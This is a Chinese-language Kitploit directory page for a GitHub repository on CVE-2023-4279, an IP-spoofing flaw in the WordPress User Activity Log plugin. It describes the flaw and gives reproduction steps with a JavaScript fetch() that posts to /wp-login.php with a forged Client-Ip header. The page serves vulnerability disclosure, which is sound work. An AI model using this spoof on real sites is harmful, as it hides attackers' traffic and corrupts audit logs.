Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-4279 — CVE-2023-4279 漏洞的仓库。 | Kitploit
工具/GitHubGitHub/b0marek/cve-2023-4279
漏洞分析漏洞利用IDS/IPS规避冒充工具信息收集Web安全
GitHubb0marek/cve-2023-4279

CVE-2023-4279

CVE-2023-4279 漏洞的仓库。

查看仓库
62年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE ID: CVE-2023-4279

漏洞类型: IP 地址欺骗

描述: 该插件从可能不可信的请求头中获取客户端 IP 地址,攻击者可以操纵该值,从而隐藏恶意流量的来源。

复现步骤:

root@kitploit:~
1. 在用户活动日志 > 设置中,启用“记录用户的 IP 地址”选项并保存设置。

2. 在浏览器中运行以下代码,并注意后端显示的 IP 地址已被伪造。

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
}); 

参考:

  1. https://wpscan.com/vulnerability/2bd2579e-b383-4d12-b207-6fc32cfb82bc
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4279
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-activity-log/user-activity-log-166-ip-address-spoofing
下载工具